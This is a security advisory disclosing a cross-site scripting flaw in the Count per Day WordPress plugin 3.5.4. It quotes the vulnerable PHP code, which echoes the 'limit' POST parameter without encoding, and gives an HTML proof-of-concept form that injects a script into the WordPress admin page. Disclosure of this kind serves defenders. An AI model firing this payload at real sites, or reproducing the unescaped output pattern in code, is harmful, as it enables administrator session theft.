WordPress Count Per Day plugin version 3.5.4 suffers from a cross site scripting vulnerability.
d69f6409f9285b4b341d81988998df80a9629b3685c4fee05a3057a084dfc9e1
------------------------------------------------------------------------
Cross-Site Scripting in Count per Day WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016
------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Count per Day
WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.
------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0024
------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Count per Day WordPress Plugin
version 3.5.4.
------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Count per Day version 3.5.5.
------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/cross_site_scripting_in_count_per_day_wordpress_plugin.html
This issue exists in the file counter-options.php and is caused due to the lack of output encoding on the limit POST parameter.
<?php // mass bots ?>
<div class="postbox">
<?php
$limit = (isset($o['massbotlimit'])) ? $o['massbotlimit'] : 25;
$limit = (isset($_POST['limit'])) ? $_POST['limit'] : $limit;
$limit_input = '<input type="text" size="3" name="limit" value="'.$limit.'" style="text-align:center" />';
In order to exploit this issue, the attacker has to lure/force a logged on WordPress Administrator into opening a malicious website.
Proof of concept
<html>
<body>
<form action="http://<target>/wp-admin/options-general.php?page=count-per-day%2Fcounter-options.php" method="POST">
<input type="hidden" name="limit" value=""><script>alert(1);</script>" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
------------------------------------------------------------------------
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.